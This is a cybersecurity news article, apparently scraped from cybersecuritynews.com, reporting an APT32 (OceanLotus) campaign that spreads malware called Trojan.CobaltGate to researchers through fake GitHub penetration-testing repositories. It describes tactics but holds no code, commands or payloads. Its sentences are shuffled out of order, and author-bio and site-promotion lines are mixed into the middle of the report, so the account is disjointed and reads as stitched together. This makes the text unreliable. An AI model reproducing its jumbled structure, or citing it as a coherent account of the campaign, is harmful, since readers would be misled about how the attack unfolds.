The malware, detected by ThreatBook analysts as Trojan.CobaltGate, employs a multi-stage infection chain beginning with socially engineered GitHub repositories posing as legitimate penetration testing tools. This technique allows the malware to blend command traffic with legitimate GitHub API calls, bypassing network monitoring tools that whitelist interactions with the platform. ThreatBook researchers identified the campaign’s signature tactic: weaponized repositories automatically clone and execute payloads via GitHub Actions workflows configured with encrypted triggers. With over 87 million developers using GitHub, the platform’s dual role as collaboration hub and attack vector demands renewed scrutiny from enterprise security teams. Attackers use GitHub Issues and Discussions to promote these tools to professionals searching for red-teaming resources, creating an appearance of authenticity through fake contributor activity and star ratings. Researchers urged organizations to implement code repository monitoring solutions that analyze repository contributor histories, detect anomalous API token usage patterns, and profile actions workflow behaviors. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. The APT32 (OceanLotus) has launched a novel campaign weaponizing GitHub repositories to distribute malware to cybersecurity researchers and enterprises. ThreatBook’s analysis reveals the DLL leverages API hooking to intercept security product communications, specifically targeting endpoint detection and response (EDR) solutions through forged Microsoft telemetry certificates. These repositories contain obfuscated malicious code within PowerShell scripts and Visual Basic modules designed to bypass static analysis tools. This technique allows threat actors to maintain plausible deniability while enabling remote code execution through compromised GitHub accounts. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. This reconnaissance phase collects domain architecture details and transmits them to attacker-controlled GitHub Pages sites masquerading as analytics platforms. This operation represents a strategic shift from the group’s historical focus on Southeast Asian government and corporate targets, instead exploiting the trust inherent in open-source platforms to infiltrate specialized defense communities. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. The malware exhibits modular architecture with components tailored for credential harvesting, lateral movement, and persistent access to enterprise networks.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 11 Apr 2025 15:20:15 +0000